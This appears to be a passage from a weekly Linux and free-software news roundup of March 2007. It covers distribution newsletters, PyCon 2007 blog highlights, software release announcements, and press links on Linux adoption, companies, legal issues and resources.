The DistroWatch Weekly for March 5, 2007 is out. "This is the most enjoyable part of the year for those Linux users who enjoy testing the development releases of Linux distributions - Fedora, Mandriva, Ubuntu, SimplyMEPIS and PCLinuxOS all delivered brand new test builds last week and the first impressions of all of them are highly positive. In the news section, a start-up project releases Ubuntu Muslim Edition, Sun Microsystems joins the Free Software Foundation, and Linux and open source software makes a serious impact on education. Finally, don't miss our commentary on the future of DistroWatch Weekly where you can have your say over the direction your favourite publication takes over the next few weeks."
The Fedora Weekly News for March 5, 2007 covers Announcing Fedora 7 Test 2 (6.91), Reduction of Fedora releases (in Bugzilla), Phoronix: Fedora 7 KVM Virtualization How-To, IBM DeveloperWorks: Build a Fedora Live CD, Linux.com: Fedora cleans its repositories, considers move to Free Software, and several other topics.
The Gentoo Weekly Newsletter for February 26, 2007 looks at GWN is seeking help, Heard in the community, Gentoo in the press and several other topics.
Package updates
Xen is back in the Fedora kernel package.
Newsletters and articles of interest
Linux.com looks at the direction of Fedora. "The Red Hat-sponsored Fedora project is undergoing several changes before the release of its next version. In preparation for Fedora 7, which will fuse the Core and Extra software repositories, Fedora's developers are auditing the repositories for non-free and non-open software that doesn't meet the project's guidelines. Eventually, the project may change its package guidelines to only allow Free Software."
O'ReillyNet looks at making NetBSD multiboot-compatible. "The i386 architecture is full of cruft required to maintain compatibility with old machines that go back as far as the 8086 series. Technically speaking, these features aren't necessary anymore because any recent computer based on this architecture uses a full 32-bit operating system that could work perfectly fine without the legacy code. Unfortunately, the compatibility hacks remain in place and hurt the development of new software."
HowtoForge sets up a desktop with Ubuntu 6.10 "Edgy Eft". "With the release of Microsoft's new Windows operating system (Vista), more and more people are looking for alternatives to Windows for various reasons. This tutorial is the third in a series of articles where I will show people who are willing to switch to Linux how they can set up a Linux desktop (Ubuntu 6.10 Edgy Eft in this article) that fully replaces their Windows desktop, i.e. that has all software that people need to do the things they do on their Windows desktops. The advantages are clear: you get a secure system without DRM restrictions that runs also on older hardware, and the best thing is: all software comes free of charge."
Distribution reviews
PerformancePC reviews Puppy Linux 2.14. "Put together from scratch by Australian Barry Kauler, Puppy Linux is an extraordinary development, being a first-class OS that can load itself into and run completely from as little as 128 MB of RAM! And this includes being able to open and save your work completely in RAM. Naturally, working this way is very fast and quiet; you won't hear much noise coming from your hard drive! Right from the sparse opening screen and the puppy bark, you are treated to a very warm, comforting little world unto itself."
InternetNews.com looks at RHEL 4.5. "This week Red Hat rolled out a beta release of its fifth update to RHEL 4 officially tagged Red Hat Enterprise Linux 4.5, providing users with a small taste of the virtualization that is to come in RHEL 5."
Linux.com reviews Sidux. "Sidux aims to be the best Debian sid-based live CD -- and it succeeds. It offers a clean, easy hard disk install and a fast release cycle. It's a rare distribution that impresses me before I've even tried it, but sidux did just that when, a few hours after I'd downloaded and burned a two-day-old preview release, the project announced that the next release was available for download. Clearly the sidux team intends to live up to its fast release philosophy."
DesktopLinux looks at SystemRescueCD 0.3.3. "The Gentoo-based SystemRescueCD 0.3.3 live CD was released on March 1, sporting a spiffy new 2.6.19.2 kernel and the WMaker desktop environment. As its name implies, SystemRescueCd is a Linux system on a bootable CD-ROM that can be used for repairing a system and its data following a crash."
Page editor: Rebecca Sobol
Development
PyCon 2007, the 2007 Python Language Conference, took place on February 23-25, in Addison, Texas.
PyCon is a community-oriented conference targeting developers of Python applications and the Python interpreter itself. The organizers aim to make the conference affordable and accessible to all.
PyCon gives you opportunities to:
- see a variety of presentations, panels, and impromptu discussions.
- learn about significant advances in the Python development community.
- meet fellow developers from around the world.
- participate in programming sprints with fellow developers.
PyCon 2007 may be one of the most blogged-about conferences yet.
What follows is a collection of comments from members of the Python
community describing conference highlights.
Python creator Guido van Rossum put together a PyCon 2007 Review:
"I'm exhausted, but it's been a great week. The conference exceeded all my (and everybody else's) expectations, with a 40% attendance increase, excellent keynotes, and an incredible "buzz"."
Guido mentioned talks on IronPython, the One Laptop Per Child project,
the keynote speeches, Python 2.6 and the state of the Python 3000 project
(Python 3.0):
"For me personally, this conference signified the coming together of the Python 3000 project (a.k.a. Py3k or Python 3.0). While in last year's keynote about this topic I mostly presented proposals, process, and plans, this year I could reveal many finished (as well as some unfinished or controversial) features, a concrete timeline with an alpha and a final release date (June 2007 and 2008, respectively), and, most importantly, a well-defined migration strategy."
Guido has published some Video and Powerpoint Slides from his Python 3000 talk.
Jesse Noller says OLPC Has Excited me:
"Many other people are blogging about it - but this morning opening Keynote by Ivan Krstić of the One Laptop Per Child project was easily one of the best keynotes/presentations I have ever seen.
My view of the project has changed."
Grig Gheorghiu discusses the OLPC talk during PyCon day 1:
"OLPC wants to change the way teaching and learning is done these days; they want to go back to the time when preschool kids interacted with each other by playing, and learned naturally peer-to-peer (as opposed to institutionalized teaching, which is one-to-many)"
Matt Harrison covered the Testing Tools Panel:
"I've blogged about bugs and testing in open source previously, so I was quite interested in this panel. I was surprised because there was little discussion of code coverage, because I think it is quite important for dynamic languages to have good coverage. (I find that doctest and coverage.py not working together is a huge warning sign that people are ignoring coverage)."
Matt also had some Pycon2007 observations and thoughts:
"Ubuntu appears to be the linux distro of choice now. I think I was the only one running a non-ubuntu linux (gentoo). This was quite surprising cause I met quite a few last year running Gentoo. (But since both make pretty liberal use of python I won't complain too hard). Only saw one Vista machine (Jim Hugunin), but the rest seemed pretty evenly split among mac/xp/ubuntu. Draw whatever conclusion you want from that.
It appears that a lot of companies are looking to hire python people, and are having a hard time finding them."
Richard Jones covers day 3 of the event:
"I chaired a mixed-bag session which included some discussion on teaching programming with Python and finished up with a cool web widgets library. I then had some more hallway BoF, practised my lightning talk and attended the women-in-IT talk. Anna had some really interesting things to say, as she's done a pretty good survey of the available literature on the subject. The main conclusion she came up with is "we don't know for sure" why the imbalance is there, but there's some really good theories. Top of the list is culture, both outside IT (women don't do programming) and inside IT (the geek/wizard culture)."
Ned Batchelder put together a Pycon blog:
"I wasn't able to pay good attention to the web frameworks panel due to a crisis elsewhere, but from the testing tools panel:
Chad Whitacre: "I'm addicted to dots." If you don't know what that means, you need to write (or run) more unit tests.
Titus Brown: "I don't use test-driven development, I use stupidity-driven testing: when I do something stupid, I wrote a test to make sure I don't do it again.""
Spyced presents some PyCon SQLAlchemy tutorial slides.
"My SQLAlchemy tutorial went pretty well for the most part. It was a fast pace but most people kept up pretty well. If I did it again I would add more of an intro to ORM in general for people who had never used one, but over half the attendees had used SO or django's or tried SA already."
The Voidspace Techie Blog covers the Python Community, Rails Community, Beautiful Code and the Testing Culture:
"That aside, despite appreciating both languages, Andrzej feels that he learns more from the Ruby community. I mentioned earlier that Andrzej isn't a language zealot. He is a zealot for agile development techniques. What he appreciates about both Ruby and Python is that they are languages that assist and encourage in the production of beautiful and elegant code. He cares about the beauty of his code, ugly code offends him."
Brett Cannon's PyCon 2007 Report:
"After the keynote I do what I did last year, I ignored almost all talks and hacked. =) I decided I wanted to get my PEP 362 implementation finished before the sprints started (and I did; see the sandbox). It was interesting developing some code that is both 2.6 and 3.0 compatible. If you have a need for an object representation of a function/method signature then go ahead and grab the code."
Richard Jones covered the PyCon 2007 Game Sprint:
"The "Game Sprint" has been about as disorganised as I'd expected. A few of us messed around writing games along the theme of "small" (with extremely loose interpretation ;). Mostly people used the exercise to learn pygame or PyOpenGL (or even in one case Python as well!) and write a game at the same time. Everyone seemed to have fun doing so, and there's now a few more people comfortable with the toolkits, which was the ultimate goal."
Titus Brown announced the new testing-in-python mailing list.
"Catalyzed by the great fun we had at PyCon '07, Grig Gheorghiu and I have created the "testing-in-python" (or "TIP") mailing list. This list will hopefully serve as a forum for discussing Python testing tools, testing approaches useful in Python, Web resources for same, and whatever else people would like to talk about."
Glyph Lefkowitz is Recovering from PyCon:
"One cool thing that I can shout from the rooftops already is that Guido, a group of concerned hackers, and I got to have a meeting of the minds, which Guido has already blogged about, addressing many upcoming concerns we all had about Python 3. That, and several other discussions with the responsible developers about the proposed transition plans for the 3.0 release have put my mind at ease."
Photographs of the event have been published by Jeremy Hylton and Grig Gheorghiu.
Lastly, Andrew Kuchling wrapped up the event with his PyCon wrapup and PyCon 2007 is over summary.
"At-the-door registration was surprisingly stronger than we had been expecting, and the final attendance figure was 593 registered attendees, a 44% increase from 2006.
The conference ran smoothly -- there were no disasters, only the odd oversight on our part or minor glitches."
System Applications
Audio Projects
Version 0.9.80 of Rivendell, a radio automation system, has been
released. This version adds SAS router support, RDImport improvements,
a new metadata format, RDCatch error alarms, RDAirPlay log autoloading,
a database update and bug fixes.
Database Software
Version 2.0.1 Release Candidate 2 of the Firebird DBMS has been announced. "This sub-release introduces a number of bug fixes done since the v.2.0 release in November. It does not add any new functionality to the database engine. A minor improvement is detection of Gentoo or FreeBSD during configuration."
Version 1.3.5 of innotop, a MySQL queries and status monitoring application, has been announced. "Version 1.3.5 is nearly feature-complete for the upcoming stable 1.4 release. I recommend that everyone upgrade to it. There are a lot of new features, including some that were scheduled for 1.6 but got moved sooner because of user requests."
Beta version 5.1.16 of the MySQL DBMS is available. "Bear in mind that this is a beta release, and as any other pre-production release, caution should be taken when installing on production level systems or systems with critical data."
The March 4, 2007 edition of the PostgreSQL Weekly News is online with the latest PostgreSQL DBMS articles and resources.
Filesystem Utilities
Stable version 5.7 of TestDisk is available. "TestDisk is a tool to check and undelete partitions. It works with the following partitions: FAT12, FAT16, FAT32, Linux (EXT2/EXT3/HFS/JFS/RFS/XFS), Linux Raid, Linux swap, NTFS (Windows), BeFS (BeOS), UFS (BSD), and Netware NSS."
Interoperability
Version 3.0.25 pre 1 of Samba has been announced. "This is a preview release of the Samba 3.0.25 code base and is provided for testing only. This release is *not* intended for production servers. There has been a substantial amount of development since the 3.0.23/3.0.24 series of stable releases. We would like to ask the Samba community for help in testing these changes as we work towards the next significant production upgrade Samba 3.0 release." See the release notes for more information.
Mail Software
Stable version 3.1.2 of Mailfromd has been announced. "Mailfromd is a general-purpose mail filtering daemon for Sendmail and Postfix. It is able to filter both incoming and outgoing messages using criteria of arbitrary complexity, supplied by the administrator in the form of a script file. The program interfaces with Sendmail using Milter protocol. Mailfromd provides the following basic features: flexible programming language for writing filter scripts, sender address verification, greylisting and whitelisting, controlling mail sending rate."
Web Site Development
Version 4.0 of ccHost, a web-based media sharing system, is out. "This release builds upon ccHost's novel support of collaboration, sharing, and storage of multi-media using the different Creative Commons licenses and metadata. These features most notably show up and are tested in Creative Commons' project, ccMixter (www.ccmixter.org), a popular on-line social network service that supports legal music sharing and remixing."
The March 2, 2007 edition of the Midgard Weekly Summary
is out with the latest news from the Midgard web content management system.
Version 3.3.0 of mnoGoSearch, a web site search engine, is out with a long list of improvements. See the change log for details.
Desktop Applications
Audio Applications
KDE.News notes the publication of issue 7 of the Amarok Newsletter. "We talk about Amarok's success in the LinuxQuestions.org yearly poll, new features in the upcoming Amarok 2, and continue to point out interesting related projects. Read on for some Amarok lovin' from Wil Wheaton. In the other news, Wil Wheaton from Star Trek reviews Amarok."
Version 0.59 of Mammut, an audio FFT application, is out with several
new features and bug fixes.
Business Applications
Version 4.0 of Pythomnic has been announced; it adds several new capabilities. "Pythomnic is a platform for building non-stop middleware around a set of network services. It allows changing source code and configuration on the fly without interrupting the live service. Pythomnic modules can be invisibly migrated from one server to another for redundancy or load balancing. Such middleware can take as much business logic as necessary, from being a simple adapter to an integration platform."
Data Visualization
Version 4.2 of Gnuplot, a data graphing utility, is out. "Of particular note in this release is support for screen display via a new gnuplot terminal type "wxt", based on the wxWidgets, Cairo, Pango libraries. This gives superb font rendering and plot anti-aliasing. Anyone interested in the future directions of gnuplot development may want to have a look also at upcoming features showcased on the demo site for the CVS development version."
Desktop Environments
Version 2.17.92 of the GNOME desktop environment is available for testing. "Here we go: this is the last unstable release before 2.18.0. We've all added cool features, important bug fixes, great translations, or shiny documentation during the past six months. And it'll be soon ready for public consumption."
Version 2.17.92 of GARNOME, the bleeding edge GNOME distribution, is out. "We are pleased to announce the release of GARNOME 2.17.92 Desktop and Developer Platform. This release includes all of GNOME 2.17.92 (aka 2.18.0 Release Candidate), tweaked and updated with love by the GARNOME Team."
The following new GNOME software has been announced this week:
You can find more new GNOME software releases at gnomefiles.org.
The March 4, 2007 edition of the KDE Commit-Digest has been announced. The content summary says: "KSplashX, a potential replacement for the KSplashML engine is imported into KDE SVN. Continued progress in the Solid and NetworkManager integration. More refinement, including better keyboard shortcuts, in Konsole. New keyboard layouts in KTouch. Icon and undo support in Step, the educational physics simulation package. KBounce becomes the latest game to move to a scalable interface and graphics. More work in KSquares, Konquest, KSpaceDuel and KReversi. KSudoku starts to be ported to KDE 4..."
The following new KDE software has been announced this week:
You can find more new KDE software releases at kde-apps.org.
The following new Xorg software has been announced this week:
More information can be found on the X.Org Foundation wiki.
Electronics
Release 3.0.3 of GNU Radio, a software programmable radio system, has been announced. "This is a bug fix and very minor enhancement update to the stable branch. All of the relevant bug fixes that have occurred on the main development trunk have been back ported here."
Financial Applications
Version 2.6.25 of SQL-Ledger, a web-based accounting system, is out with the following change: "removed error and info function customization option".
Claus Fischer has announced the launch of TXbook. "I would like to announce TXbook, a GPL accounting program for small businesses. It has successfully done my balance sheet and P&L for an Austrian small "Limited" (Ges.m.b.H.). With some work it should serve users in the EU region well; I don't know enough about the accounting systems of other areas to make a meaningful statement."
Games
Version 0.4.2 of Ember has been released. "Ember is a fully functional 3d client for the WorldForge project. It's meant to be as extensible as possible, to allow for future world builders to adapt it to their worlds or games. This release updates the authoring tools, adds a dynamic sky and includes a new framework for matching and updating models against server entities." Also, the WFUT tool has been added to Ember.
Interoperability
The March 5, 2007 edition of the Wine Weekly Newsletter is online with coverage of the Wine project. Topics include: Wine 0.9.32, OpenGL Thread Context Selection Patches, MSI OLE Automation Improvements, SoC 2007: HTMLHelp and Fedora Core 4 RPMs.
Version 0.9.32 of Wine has been announced. Changes include: "Many Direct3D fixes and performance improvements, Several new features in the builtin cmd.exe, Improvements to HTML help support and lots of bug fixes."
Mail Clients
Version 1.5.0.10 of Mozilla Thunderbird has been announced. "Mozilla Thunderbird 1.5.0.10, a security and stability update has been released. Users of Thunderbird 1.5.0.x will receive an automated update notification within a couple of days. They can also manually upgrade by selecting Check for Updates from the Help menu."
Music Applications
Version 0.6.0 of hexter is out with several new features. "hexter is a software synthesizer that models the sound generation of a Yamaha DX7 synthesizer. It can easily load most DX7 patch bank files, accept patch editing commands via MIDI sys-ex messages, and recreate the sound of the DX7 with greater accuracy than any other open-source emulation (that the author is aware of...). hexter operates as a plugin for the Disposable Soft Synth Interface (DSSI)."
Version 0.6.1 of Jackbeat, an audio sequencer/drum machine, is out.
Changes include the addition of .wav file output, 64 bit support,
full color VU meters, user interface improvements and bug fixes.
Miscellaneous
MozillaZine notes the release of SeaMonkey 1.1.1. "Following the Gecko security update releases a few days ago, the SeaMonkey project has issued new security and stability releases today for its all-in-one internet application suite. SeaMonkey 1.1.1 is now available for download, fixing several security vulnerabilities, along with a few issues reported on SeaMonkey 1.1. Simultaneously, SeaMonkey 1.0.8, a security update based on the SeaMonkey 1.0 series, was also released."
Languages and Tools
C
The GCC Interactive Compilation Interface has been launched. "We are developing an Interactive Compilation Interface (ICI) for GCC to improve its optimization heuristic, enable iterative fine-grain program optimizations for different constraints (performance, code size, power consumption, DSE, different ISAs, etc) and unify optimization knowledge reuse among different programs and architectures using statistical and machine learning techniques."
Caml
The March 6, 2007 edition of the Caml Weekly News is out with new Caml language articles.
Haskell
The March 5, 2007 edition of the Haskell Weekly News is online. This week sees the release of "Programming in Haskell", by Graham Hutton, along with a wide range of new libraries and applications, including gui programming, terminal interfaces, xml programming, a gameboy emulator, database bindings, and a Haskell compiler shootout.
Java
Elliotte Harold presents a preview of upcoming Java developments on IBM developerWorks. "2006 was another boom year for the Java platform. The Java language retained its title as the world's most used programming language, despite an onslaught of competition from both Microsoft (C#) and the scripting community (Ruby). And, while the release of Java 6 would have been cause enough for celebration, that paled in comparison to the announcement that Java was going to go fully open source under the GNU General Public License. Can the momentum continue in 2007? Let's consider the odds."
Joe Ponczak discusses Java code coverage in an O'Reilly article. "Even with unit tests approaching 100% coverage, critical logic errors could be hiding in your code. It is impossible to test every possible condition, but with a little analysis of the potential paths and a plan to test them, you can be much more confident in the quality of your tests."
Perl
The March 4, 2007 edition of the Weekly Perl 6 mailing list summary is out with coverage of the latest Perl 6 developments.
Phil Crow discusses Perl 6 Parameter Passing on O'Reilly. "Perl 6 is not finished, but you can already play with it. I hope this article will encourage you to try it. Begin by installing Pugs, a Perl 6 compiler implemented in Haskell. Note that you will also need Haskell (see directions in the Pugs INSTALL file for how to get it). Of course, Pugs is not finished. It couldn't be. The Perl 6 design is still in progress. However, Pugs still has many key features that are going to turn our favorite language into something even greater."
PHP
Version 4.4.6 of PHP is available. "The main issue that this release addresses is a crash problem that was introduced in PHP 4.4.5. The problem occurs when session variables are used while register_globals is enabled."
Python
A beta release of Jython, a Java implementation of the Python language, has been announced. "The Jython community has announced the release of Jython 2.2's first beta version. This release contains all of the major features for a 2.2 release. According to the Jython Roadmap, "Jython in its current state is quite fragile... The next Jython 2.x release will build on the cleanup in the last release, and in this release we will be able to consider performance enhancements, CPython frameworks, and other considerations that were shelved for the last release.""
New versions of pylint and astng have been announced. "The PyLint release contains a bunch of bug fixes, some new checks and command line changes, and a new checker dedicated to Restricted Python checking. If this doesn't sound familiar to you, visit the PyPy project web site for more information. The astng release contains a lot of inference fixes and enhancement, so even if pylint should still work with the old version you're strongly encouraged to upgrade."
Ruby
The March 4, 2007 edition of the Ruby Weekly News looks at the latest discussions on the ruby-talk mailing list and comp.lang.ruby newsgroup.
Tcl/Tk
The March 1, 2007 edition of the Tcl-URL! is online with new Tcl/Tk articles and resources.
The March 5, 2007 edition of the Tcl-URL! is online with new Tcl/Tk articles and resources.
IDEs
Release 1.2.8 of PyDev, a Python IDE plugin for Eclipse, is available with many new features and some bug fixes. The project description says: "Features: editor, code completion, refactoring, outline view, debugger, and other goodies".
Libraries
Version 1.1.4 (stable) of GNU libmatheval has been announced. "GNU libmatheval is a library that makes it possible to calculate mathematical expressions for given variable values and to calculate expression's derivative with respect to a given variable. The library supports arbitrary variable names in expressions, decimal constants, basic unary and binary operators and elementary mathematical functions."
Version 1.9 (stable) of the GNU Scientific Library has been announced. "The GNU Scientific Library (GSL) is a collection of routines for numerical computing. The routines are written from scratch by the GSL team in ANSI C, and present a modern API for C programmers, while allowing wrappers to be written for very high-level languages."
Version Control
Version 0.33 of Monotone, a distributed version control system,
is available. This release has an internal data format change,
lots of new features and more.
Page editor: Forrest Cook
Linux in the news
Recommended Reading
LinuxWorld looks at where to get laptops without Windows. "Two leading hardware vendors, Dell and Lenovo, are quietly selling laptops without preloaded Microsoft Windows to Linux customers who know where to look, says Lincoln Durey, CEO of EmperorLinux, an Atlanta reseller that customizes, installs and supports Linux on the major-brand laptops it sells."
Linux-Watch reports on an effort by the FSF to work with hardware vendors. "The Free Software Foundation (FSF) is expanding beyond its software boundaries, and reaching out to hardware vendors to encourage them to "work with the free software community" to establish a "mutually beneficial relationship." It's all spelled out in a just-published whitepaper. On March 1, the FSF released "The road to hardware free from restrictions," written by Justin Baugh and Ward Vandewege, senior systems administrators for the FSF. In it, they detail ways for major hardware manufacturers to work with free software for the benefit of both."
ars technica reports on the second release of OLPC laptops. "The One Laptop Per Child (OLPC) project is shipping out another set of prototype XO laptops. Designated BTest-2, this series of beta test units is primarily intended to help testers evaluate improvements to the screen and touchpad. The BTest-2 units, which are in transit to select developers, will also be used to perform early tests on the wireless mesh technology. According to the release notes, the final release version of OLPC's XO laptop will be faster and more durable than the BTest-2 units and will include several additional features. The release notes also reveal that the BTest-2 units resolve several problems documented during tests conducted on the previous BTest-1 series."
Trade Shows and Conferences
eWeek looks at Ruby support in NetBeans. "While the Eclipse open-source development community opens its EclipseCon conference, Sun Microsystems and the NetBeans community have announced an early-access release of the NetBeans Ruby Pack, which is a plug-in that provides support for the Ruby programming language. The NetBeans plug-in offers developers added support for dynamic and scripting languages and includes editing features for both Ruby and JRuby--an implementation of the Ruby programming language that runs on the Java Virtual Machine."
Comments (none posted)
LinuxMedNews covers the recent Healthcare Information and Management Systems Society conference. "This year's HIMSS conference in New Orleans is over. Here's the conference wrap-up:
CCHIT certification is being emphasized.
Interoperability progress is occurring but is still confusing.
Open source has a presence at HIMSS now!
Read more for details."
Comments (none posted)
Companies
Glyn Moody investigates the state of pre-installed Linux on Dell computers. "Dell is only talking about certifying its corporate client products. Worse, it's only talking about doing that with Novell, hardly open source's favourite company at the moment. The justification for not going further is rather unconvincing: We don't want to pick one distribution and alienate users with a preference for another. So, rather than upset supporters of some distros, Dell has decided to be scrupulously fair and to upset supporters of all distros.
It's clear from this statement that Dell is not going to offer systems with pre-installed GNU/Linux any time soon."
Comments (3 posted)
Linux-Watch analyzes Novell's 2007 first quarter financial results. "Despite the unexceptional overall results during the first fiscal quarter 2007, however, Novell reported $15 million of revenue from Linux Platform Products, up 46 percent year-over-year, and $91 million of invoicing, up a whopping 659 percent year-over-year. Linux -- make no doubt about it -- is Novell's future."
Comments (none posted)
ZDNet covers a partnership between Red Hat and Exadel. "The open-source software company said that it has established a partnership with Exadel in which Exadel will open source its Web development tools at JBoss.org, a Red Hat open-source project site."
Comments (none posted)
Linux Adoption
ZDNet reports that California is considering making the OpenDocument Format the required standard for state agencies. "Similar to the ODF bills proposed in Texas and Minnesota, California Assembly bill AB 1668 would require that state agencies "become equipped to accept all documents in an open, XML-based file format for office applications, and shall not adopt a file format used by only one entity.""
Comments (11 posted)
ZDNet UK reports on a Linux-friendly video service that is being deployed by the Waverley Borough Council. "When the European Commission launched a streaming video service last year which excluded Linux users, large swathes of the open source community became deeply angry. Now, a Surrey local council has shown that open source operating systems can be included in such programmes."
Comments (7 posted)
Linux at Work
electronicsweekly.com examines the use of Linux for fault-tolerant computing. "Choosing the operating system that an organisation uses to run its critical applications also remains a tough decision. Linux is growing in popularity compared with other operating systems and using Linux offers a route for organisations to achieve high availability at a potentially lower cost. As a free operating system, the level of cost would be much lower than other approaches and this is contributing to its growing popularity from a business continuity perspective.
An example of this is that Linux has entered the top three operating systems chart by the volume of servers sold for the first time, according to recent research by IDC."
Comments (none posted)
MySQL AB reports on the deployment of Linux and the MySQL DBMS by TRUMPF Laser. "TRUMPF has selected MySQL to control the pulsating solid-state laser in its TruPulse series of welding tools. TRUMPF TruPulse lasers are used for welding in the automotive industry, in jewelry-making and in medical technology such as the production of dental braces -- all areas in which the highest level of precision is required.
"With MySQL as the central data storage in our new laser control, we attain a clean, stable and easily expandable architecture," said Rainer Thieringer, head of software development at TRUMPF Laser. "Moreover, the open source concept fits perfectly with TRUMPF's control philosophy: Every piece of software in the laser control must be validated at the source code level.""
Comments (none posted)
Legal
The New York Times has an article on MP3 patents. "Microsoft says it was doing the right thing: paying a German rights holder $16 million to license the MP3 audio format, the foundation of the digital music boom. Then an American jury ruled that Microsoft had failed to pay another MP3 patent holder, and slapped it with a $1.52 billion judgment. But the MP3 toll gates do not end there." (Thanks to petelink)
Comments (20 posted)
Interviews
The People Behind KDE has an interview with Mauricio Piacentini. "I am working on the KDE 4 versions of KMahjongg and KMines, and trying to help with the SVG conversion and art for other applications in the kdegames module. During the last few months I had a chance to work a bit (in code and art) with Ian Wadham in KGoldRunner, and Dmitry Suzdalev in KReversi." (Found on KDE.News)
Comments (none posted)
Resources
Google Labs has released a paper [PDF] that details the failure modes from a large population of hard disk drives. "Our analysis identifies several parameters from the drive's self monitoring facility (SMART) that correlate highly with failures. Despite this high correlation, we conclude that models based on SMART parameters alone are unlikely to be useful for predicting individual drive failures. Surprisingly, we found that temperature and activity levels were much less correlated with drive failures than previously reported." (Thanks to Hale Landis).
Comments (3 posted)
Linux-Watch looks at the change in US Daylight Savings time. ""Spring forward; Fall back," That's the way the saying goes. Some years I get it backwards, but I eventually catch on. I've never had to worry about my PCs getting it wrong before, though. Now, with the recent changes in the Daylight Savings Time (DST) rules, I do. Fortunately, there are ways to make sure that both my Linux computers and I get the new rules right."
Comments (26 posted)
The latest issue of the GNOME Journal has been published. It features an introduction to GTK+ cross-platform application development, an interview with Jakub Steiner and Andreas Nilsson about the Tango Project, the first article of a series about free desktop companies, and a letter from the editor. Writers in this edition are John D. Ramsdell, Alexandre Prokoudine, Sri Ramkrishna, and Jim Hodapp, respectively.
Full Story (comments: none)
Dave Phillips looks at VST plugins. "Fully functional support for the VST plugin standard is one of the most important remaining problems for the Linux audio world. VST plugins are ubiquitous in the Win/Mac audio worlds, they are employed extensively in professional and desktop music software, and it may be no exaggeration to claim that the VST standard has revolutionized computer-based creation of music and sound. Given its great popularity this writer believes that stable VST support would give Windows users a compelling reason to try Linux as an alternate or replacement platform, especially if they have a sizeable investment of money and experience in their collection of VST plugins."
Comments (10 posted)
Issue #136 of the Linux Gazette has been published. Topics include: Mailbag, Talkback, 2-Cent Tips, NewsBytes, Keymap and IOCTLs, A Report on SCaLE5x, A Beginner's Guide to Dual Booting Linux Mint and Windows XP, Measuring TCP Congestion Windows, The Open Source Hook, Interview: Orv Beach, Publicity Chair/SCaLE (Southern California Linux Expo), HelpDex, The Geekword Puzzle, The Linux Launderette and The LG Backpage.
Comments (none posted)
Baron Schwartz discusses the use and optimization of DBMS software in the context of online gaming. "Imagine a site that keeps track of gamers' scores in computer games and displays gamers in "leaderboards" ordered by decreasing score. The site is written in PHP and the backend is a MySQL 5 database server. Because the data changes frequently, the server uses the InnoDB storage engine."
Comments (none posted)
Linux Journal looks at how Single Packet Authorization fills the gaps in port knocking. "Vulnerabilities have been discovered in all sorts of security software from firewalls to implementations of the Secure Shell (SSH) Protocol. For example, OpenSSH is developed by some of the most security-conscious developers in the world, and yet it occasionally contains a remotely exploitable vulnerability. This is an important fact to note because it seems to indicate that security is hard to achieve and, therefore, bolsters the case for a defense-in-depth approach. This article explores the concept of Single Packet Authorization (SPA) as a next-generation passive authentication technology beyond port knocking."
Comments (33 posted)
Reviews
Linux.com takes a look at Conary. "rPath's Conary is a second-generation package manager. Considering that Erik Troan, rPath's CTO and co-founder, was one of the original authors of the RPM package format, some might be tempted to view Conary as an effort to do things right the second time around -- nor is that view far from wrong. In its design, Conary is a streamlined version of dpkg or RPM with Yum in which all the utilities of those package managers are combined in a single command and combined with version control to meet the demands of a modern distribution."
Comments (none posted)
Linux.com reviews Inkscape 0.45. "The number one most exciting new feature in Inkscape 0.45 is the addition of the first SVG Filter to the feature set, Gaussian blur. In accordance with the SVG specification, you can now adjust a blur setting for every object in a drawing, just the way you would adjust its fill color, stroke width, or opacity."
Comments (none posted)
KDE.News presents a comparison between the Konqueror and Dolphin file managers. "Dolphin is a new File Manager for KDE 4 which is dedicated 100% to file management, and is not intended to be a one-size-fits-all tool as Konqueror currently attempts. It is intended to optimize your file management related tasks, and present an easy to use file manager for casual KDE use. That doesn't mean it won't be powerful or configurable, only that Dolphin is being built for a single purpose."
Comments (2 posted)
ZDNet has run a look at the One Laptop Per Child project by Jeremy Allison. "But the real genius in the OLPC laptop is in the software. The OLPC is a completely open hardware system. There are no closed proprietary pieces to make support difficult. The software is the same, and it drives much of the needed sophistication in making the limited hardware perform acceptably. This is a system designed for people to learn from."
Comments (4 posted)
Linux.com reviews sshguard. "Are you concerned about brute force dictionary attacks on SSH? Given the popularity of these attacks, you should be. sshguard is a new tool to help protect against such attacks. Although it is still in beta stage, it appears to work well."
Comments (21 posted)
Linux.com takes a look at PHP 6.0. "Andrei Zmievski is one of the leading developers of the PHP programming language. Since March 2005, he has been working with about 20 other developers to add Unicode support to version 6.0 of PHP. Now their efforts are nearing an alpha release."
Comments (39 posted)
Miscellaneous
Linux.com tackles the issues of paying some people to develop free software. "What happens when a free and open source software (FOSS) project attempts to introduce compensation for its developers? Because FOSS remains based largely on volunteer work, many worry that payment might demotivate both those who receive it and those who do not. However, community leaders who have observed how payment interacts with the FOSS ethos suggest a more complicated picture. Identifying four main types of payment -- bounties, payment in kind, grants, and employment -- these experts suggest that what happens depends on the type of payment, as well as on the individuals involved."
Comments (1 posted)
Page editor: Forrest Cook
Announcements
Non-Commercial announcements
Work is being done to update the GNOME contributors list. "Do you all remember that we list our contributors in About GNOME? The list of GNOME contributors is probably outdated: many people contributed a lot of stuff in recent years and are not there. It's a shame to not thank them, so we have to fix this!
It would be really great if all maintainers could take 10 minutes and check that all of their main contributors are listed in there."
Full Story (comments: none)
For those who are curious about decision making within the GNOME project: the minutes from the March 1 GNOME Foundation board are now available. "Luis had a meeting with James Vasile of the Software Freedom Law Center, as one of the GNOME Foundation legal representatives and sent minutes of the meeting to the board list. We are in the process of signing a client agreement with the SFLC. James and Luis discussed various issues on which we might consult with the SFLC, including trademark, code audits, and patent issues."
Full Story (comments: none)
The GNOME project has announced its participation in the 2007 Google Summer of Code. "GNOME will participate in Summer of Code 2007. We've started to collect ideas of projects for students. If you can think of a project that would make a good SoC project, please add it to this page before March 13th."
Full Story (comments: none)
GarageGames.com, Inc. has announced the launch of GreatGamesExperiment.com, a social networking site which emphasizes gaming. "Getting games made is only half of the problem. Finding an audience once you have sweat out two or three years of development is extremely difficult," says Great Games Experiment creator Jeff Tunnell. "Getting a lot of 'eyeballs' to look at your game is important, and social networking sites are a method of allowing a community to create its own content and momentum."
Full Story (comments: none)
KDE.News has announced the availability of the KDE e.V. fourth quarter report [PDF]. "It covers the board meeting in Darmstadt, the fate of the technical working group and the status of the SQO-OSS research project. As usual there are reports from the working groups, including business cards, a branding meeting, an active HCI group and 27,478 commits. New members and finances are also covered."
Comments (none posted)
